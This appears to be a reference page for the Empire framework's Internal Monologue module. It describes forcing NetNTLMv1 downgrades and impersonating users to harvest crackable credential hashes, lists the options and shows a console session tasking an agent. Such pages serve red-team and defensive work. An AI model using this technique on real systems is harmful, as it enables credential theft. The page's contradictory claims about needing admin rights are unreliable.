Invoke-InternalMonologue - Empire Module

This page contains detailed information about how to use the powershell/credentials/invoke_internal_monologue Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-InternalMonologue
Module: powershell/credentials/invoke_internal_monologue
Source code [1]: empire/server/modules/powershell/credentials/invoke_internal_monologue.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-InternalMonologue.ps1
MITRE ATT&CK: T1003
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: No

The invoke_internal_monologue module uses the Internal Monologue attack to force easily-decryptable Net-NTLMv1 responses over localhost and without directly touching LSASS. The underlying powershell function accepts switches that [DISABLE] default behaviours. The default settings will downgrade NetNTLM responses to v1, impersonate all users, use challenge 1122334455667788 and restore the registry to its original state. Set the options in this module to True in order to DISABLE the behaviours.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_internal_monologue module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the invoke_internal_monologue module:

Agent
Agent to use for InternalMonologue.

Challenge
Net-NTLM Challenge to send.
Default value: 1122334455667788.

Additional Module Options

---

This is a list of additional options that are supported by the invoke_internal_monologue module:

Downgrade
DISABLE downgrading to allow Net-NTLMv1 responses.

Impersonate
DISABLE user impersonation and fetch only current user.

Restore
DISABLE restoring the registry setting that allowed v1 responses.

Verbose
Verbose.

Invoke_internal_monologue Example Usage

---

Here's an example of how to use the invoke_internal_monologue module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/invoke_internal_monologue

 Author       @eladshamir                                                            
              @4lex                                                                  
 Background   False                                                                  
 Comments     https://github.com/eladshamir/Internal-Monologue                       
 Description  Uses the Internal Monologue attack to force easily-decryptable Net-    
              NTLMv1 responses over localhost and without directly touching LSASS.   
              The underlying powershell function accepts switches that [DISABLE]     
              default behaviours. The default settings will downgrade NetNTLM        
              responses to v1, impersonate all users, use challenge 1122334455667788 
              and restore the registry to its original state. Set the options in     
              this module to True in order to DISABLE the behaviours                 
 Language     powershell                                                             
 Name         powershell/credentials/invoke_internal_monologue                       
 NeedsAdmin   True                                                                   
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/T1003                               


,Record Options------------------,----------,------------------------------------,
| Name        | Value            | Required | Description                        |
|-------------|------------------|----------|------------------------------------|
| Agent       |                  | True     | Agent to use for InternalMonologue |
|-------------|------------------|----------|------------------------------------|
| Challenge   | 1122334455667788 | True     | Net-NTLM Challenge to send         |
|-------------|------------------|----------|------------------------------------|
| Downgrade   |                  | False    | DISABLE downgrading to allow Net-  |
|             |                  |          | NTLMv1 responses                   |
|-------------|------------------|----------|------------------------------------|
| Impersonate |                  | False    | DISABLE user impersonation and     |
|             |                  |          | fetch only current user            |
|-------------|------------------|----------|------------------------------------|
| Restore     |                  | False    | DISABLE restoring the registry     |
|             |                  |          | setting that allowed v1 responses  |
|-------------|------------------|----------|------------------------------------|
| Verbose     |                  | False    | Verbose                            |
'-------------'------------------'----------'------------------------------------'

(Empire: usemodule/powershell/credentials/invoke_internal_monologue) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/invoke_internal_monologue) > set Challenge 1122334455667788
[*] Set Challenge to 1122334455667788
(Empire: usemodule/powershell/credentials/invoke_internal_monologue) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors

---

• @eladshamir
• @4lex

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/credentials/invoke_internal_monologue.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/credentials/Invoke-InternalMonologue.ps1
• https://github.com/eladshamir/Internal-Monologue
• http://attack.mitre.org/techniques/T1003
• https://linkedin.com/in/eladshamir
• https://stackoverflow.com/questions/311165/how-do-you-convert-a-byte-array-to-a-hexadecimal-string-and-vice-versa
• https://stackoverflow.com/questions/3600322/check-if-the-current-user-is-administrator
• https://stackoverflow.com/questions/321370/how-can-i-convert-a-hex-string-to-a-byte-array
• https://stackoverflow.com/questions/5613279/c-sharp-hex-to-ascii
• https://stackoverflow.com/questions/33111014/redirecting-output-from-an-external-dll-in-powershell

See Also

---

Check also the following modules related to this module:

• powershell/credentials/invoke_kerberoast
• powershell/credentials/invoke_ntlmextract
• powershell/lateral_movement/invoke_psexec
• powershell/lateral_movement/invoke_sqloscmd
• powershell/code_execution/invoke_metasploitpayload
• powershell/code_execution/invoke_ntsd
• powershell/code_execution/invoke_shellcodemsil
• powershell/code_execution/invoke_assembly
• powershell/code_execution/invoke_reflectivepeinjection
• powershell/code_execution/invoke_ironpython
• powershell/code_execution/invoke_clearscript
• powershell/code_execution/invoke_dllinjection
• powershell/code_execution/invoke_ironpython3
• powershell/code_execution/invoke_shellcode
• powershell/code_execution/invoke_ssharp
• powershell/code_execution/invoke_boolang
• powershell/exploitation/invoke_spoolsample
• powershell/management/invoke_script
• powershell/management/invoke_sharpchisel
• powershell/management/invoke_socksproxy
• powershell/lateral_movement/invoke_psremoting
• powershell/lateral_movement/invoke_executemsbuild
• powershell/lateral_movement/invoke_dcom
• powershell/lateral_movement/invoke_portfwd
• powershell/lateral_movement/invoke_smbexec
• powershell/lateral_movement/invoke_wmi
• powershell/lateral_movement/invoke_wmi_debugger
• powershell/lateral_movement/invoke_sshcommand

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.